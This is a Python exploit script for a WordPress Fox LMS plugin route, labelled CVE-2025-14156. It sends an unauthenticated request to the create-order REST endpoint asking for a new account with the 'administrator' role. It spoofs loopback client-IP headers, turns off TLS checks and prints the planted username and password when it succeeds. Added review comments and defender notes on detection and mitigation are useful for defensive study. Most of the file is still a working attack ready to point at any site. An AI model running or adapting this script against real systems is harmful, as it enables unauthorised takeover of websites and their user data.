#By: Nxploited
#Github: https://github.com/Nxploited
#Telegram: https://t.me/KNxploited

# Proof-of-concept that its author labels CVE-2025-14156 (see the argparse
# description in main()). It sends a single JSON POST, with no credentials or
# nonce attached, to the WordPress REST route
#   /wp-json/fox-lms/v1/payments/create-order
# The body carries account fields plus "role": "administrator".
# NOTE(review): the script does not show how the plugin processes "role";
# presumably the route creates a user from the body without restricting the
# requested role - confirm against the vendor advisory for this CVE.
#
# Defender notes, derived only from the request built below:
#   - Detection: POST requests to .../fox-lms/v1/payments/create-order whose
#     JSON body contains a "role" key. The hard-coded User-Agent, username and
#     e-mail are trivially changed, so treat them as low-confidence indicators.
#   - Triage: review administrator accounts created around the time of such
#     requests in the access log.
#   - Mitigation: update the plugin that registers this route to a release
#     that fixes the CVE (the fixed version is not stated on this page).

import sys
import argparse
import json
import requests


def encode_utf8(data):
    """Return a copy of *data* with every string made UTF-8 encodable.

    Dicts and lists are walked recursively; dict keys are converted with
    str(). Each str value is encoded to UTF-8 with errors='replace' and
    decoded again, so characters that cannot be encoded (lone surrogates)
    become '?'. Any other value is returned unchanged.
    """
    if isinstance(data, dict):
        return {str(k): encode_utf8(v) for k, v in data.items()}
    elif isinstance(data, list):
        return [encode_utf8(i) for i in data]
    elif isinstance(data, str):
        return data.encode('utf-8', errors='replace').decode('utf-8')
    else:
        return data


def send_exploit(target_url: str) -> bool:
    """POST the account-creation body to the create-order route of *target_url*.

    Args:
        target_url: Base URL of the site; the REST route is appended as-is.

    Returns:
        True when the response matches one of the script's success
        heuristics (any cookie set, or a 200 JSON body containing one of
        four keywords); False otherwise, including on request errors.

    NOTE(review): both heuristics are loose (see the comments below), so a
    True result does not by itself prove that an account was created;
    confirm against the site's user list.
    """
    endpoint = f"{target_url}/wp-json/fox-lms/v1/payments/create-order"
    # The "role" value is the only field that asks for elevated privileges;
    # the remaining fields are ordinary registration data plus a course id.
    payload = {
        "first_name": "Attacker",
        "last_name": "User",
        "username": "nxploited",
        "email": "nx@nxploit.site",
        "password": "Nxploited@2025Strong",
        "role": "administrator",
        "courseId": 1
    }
    payload = encode_utf8(payload)
    # Four client-IP headers are set to loopback.
    # NOTE(review): nothing in this script shows that the target needs or
    # honours them; whether they have any effect depends on the server and
    # proxy configuration.
    headers = {
        "Content-Type": "application/json",
        "User-Agent": "Nxploit-CCL-Bypass",
        "X-Requested-With": "XMLHttpRequest",
        "X-Forwarded-For": "127.0.0.1",
        "X-Originating-IP": "127.0.0.1",
        "X-Remote-IP": "127.0.0.1",
        "X-Remote-Addr": "127.0.0.1",
        "Accept": "application/json, text/javascript, */*; q=0.01",
        "Accept-Language": "en-US,en;q=0.9"
    }
    try:
        # verify=False turns off TLS certificate validation (requests will
        # emit an InsecureRequestWarning); redirects are not followed, so a
        # 3xx answer is judged on its own status code and cookies.
        response = requests.post(
            endpoint,
            headers=headers,
            data=json.dumps(payload),
            verify=False,
            timeout=20,
            allow_redirects=False)
    except requests.exceptions.RequestException as e:
        print(f"[!] Request failed: {str(e)}")
        return False
    # Heuristic 1: any cookie in the response counts as success, whatever the
    # status code. A cookie set by the site or by a fronting proxy for
    # unrelated reasons satisfies this check too.
    cookies = response.cookies.get_dict()
    if cookies:
        print("[+] Exploit Successful!")
        # The credentials sent in the payload are echoed to stdout in clear.
        print(f"Username: {payload['username']}")
        print(f"Password: {payload['password']}")
        return True
    if response.status_code != 200:
        print(f"[!] Exploit failed. HTTP status: {response.status_code}")
        return False
    try:
        res_json = response.json()
    except Exception:
        # A body that is not valid JSON is treated as "no JSON" rather than
        # as an error.
        res_json = None
    # The status is already known to be 200 here, so the range test is always
    # true and the outer else branch is reached only when the body was not
    # JSON.
    if 200 <= response.status_code < 300 and res_json is not None:
        # Heuristic 2: plain substring match on the raw body. "user" and
        # "success" are broad enough to appear in an error payload as well.
        if any(keyword in response.text for keyword in ["administrator", "success", "user", "wordpress_logged_in"]):
            print("[+] Exploit Successful!")
            print(f"Username: {payload['username']}")
            print(f"Password: {payload['password']}")
            return True
        else:
            print("[!] Exploit response received, but did not indicate success.")
    else:
        print("[!] Did not receive expected HTTP response.")
    return False


def main() -> None:
    """Parse the required -u/--url argument and run send_exploit() once.

    Exits with status 1 when the URL does not start with "http". The return
    value of send_exploit() is ignored, so the exit status does not reflect
    the outcome of the request.
    """
    parser = argparse.ArgumentParser(
        description="CVE-2025-14156 Exploit By: Nxploited | Telegram: @Nxploited | Github: Nxploited"
    )
    parser.add_argument('-u', '--url', required=True, help='Target URL (e.g. https://victim.site)')
    args = parser.parse_args()
    print("[*] Starting CVE-2025-14156 Exploit ...")
    # Prefix check only; the value is not parsed or normalised as a URL.
    if not args.url.startswith("http"):
        print("[!] Please provide a valid URL starting with http or https.")
        sys.exit(1)
    send_exploit(args.url)


if __name__ == "__main__":
    main()